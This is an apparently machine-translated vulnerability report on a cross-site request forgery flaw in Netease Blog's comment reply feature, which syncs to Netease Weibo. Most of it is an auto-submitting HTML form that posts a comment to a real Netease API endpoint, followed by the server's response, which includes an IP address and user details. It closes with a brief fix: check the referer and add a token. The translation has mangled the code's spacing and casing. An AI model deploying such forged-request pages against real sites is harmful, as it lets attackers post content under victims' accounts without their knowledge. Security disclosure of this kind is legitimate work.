1) The reply function of the problem Defect on Netease blog will be synchronized to Netease Weibo, without verifying the referer;
2) log on to the Netease blog and run the following POC;
<Html>
<Body>
<Form id = "se55i0n" name = "se55i0n" action = "http://api.blog.163.com/lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr" method = "POST">
<Input type = "text" name = "callCount" value = "1"/>
<Input type = "text" name = "scriptSessionId" value = "$ {scriptSessionId} 187"/>
<Input type = "text" name = "c0-scriptName" value = "BlogBeanNew"/>
<Input type = "text" name = "c0-methodName" value = "addBlogComment"/>
<Input type = "text" name = "c0-id" value = "0"/>
<Input type = "text" name = "c0-e1" value = "string: fks_08701_80081_4067086083081_1_2087083074083095081070093"/>
<Input type = "text" name = "c0-e2" value = "number: 12979759"/>
<Input type = "text" name = "c0-e3" value = "string:"/>
<Input type = "text" name = "c0-e4" value = "string: ddd"/>
<Input type = "text" name = "c0-e5" value = "string: I _majia"/>
<Input type = "text" name = "c0-e6" value = "string:"/>
<Input type = "text" name = "c0-e7" value = "number:-1"/>
<Input type = "text" name = "c0-e8" value = "number:-1"/>
<Input type = "text" name = "c0-e9" value = "number: 12979759"/>
<Input type = "text" name = "c0-e10" value = "string: lli. vip"/>
<Input type = "text" name = "c0-e11" value = "string: % E6 % 9D % 8E % E9 % BB % 8E"/>
<Input type = "text" name = "c0-e12" value = "boolean: true"/>
<Input type = "text" name = "c0-param0" value = "Object_Object: {blogId: reference: c0-e1, blogUserId: reference: c0-e2, blogTitle: reference: c0-e3, content: reference: c0-e4, publisherNickname: reference: c0-e5, publisherEmail: reference: c0-e6, mainComId: reference: c0-e7, replyComId: reference: c0-e8, replyToUserId: reference: c0-e9, replyToUserName: reference: c0-e10, replyToUserNick: reference: c0-e11, synchMiniBlog: reference: c0-e12} "/>
<Input type = "text" name = "c0-param1" value = "string:"/>
<Input type = "text" name = "c0-param2" value = "boolean: false"/>
<Input type = "text" name = "batchId" value = "675126"/>
<Input type = "submit" value = "submit">
</Form>
<Script>
Document. se55i0n. submit ();
</Script>
</Body>
</Html>
The value of the parameter "c0-e4" is the reply content;
3) run the POC system and return the following results;
// # DWR-INSERT
// # DWR-REPLY
Var s0 = [];
Dwr. engine. _ remoteHandleCallback ('20170', '0', {'abstract ': "ddd", blogId: "logging", blogPermalink: "blog/static/675126", blogTitle: "\ u996E \ u98DF \ u5F80 \ u4E8B \ uFF082 \ uFF09", blogUserId: 12979759, blogUserName: "lli. vip ", circleId: 0, circleName: null, circleUrlName: null, content:" ddd ", id:" unauthorized ", ip:" 113.205.155.197 ", ipName: "\ u91CD \ u5E86", lastUpdateTime: 1363878263025, mainComId: "-1", moveFrom: null, popup: false, publishTime: 1363878263041, publishTimeStr: "23:04:23", publisherAvatar: 0, publisher: "http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg", publisherEmail: "", publisherId: 218104121, publisherName: "majiagege", publisherNickname: "I _majia", publisherUrl: null, replyComId: "-1", replyToUserId: 12979759, replyToUserName: "lli. vip ", replyToUserNick:" \ u674E \ u9ECE ", shortPublishDateStr:" 2013-3-21 ", spam: 0, subComments: s0, synchMiniBlog: true, valid: 0 });
4) return to the Weibo site, refresh the Weibo site, and view the effect;
Solution:
Verify referer and add token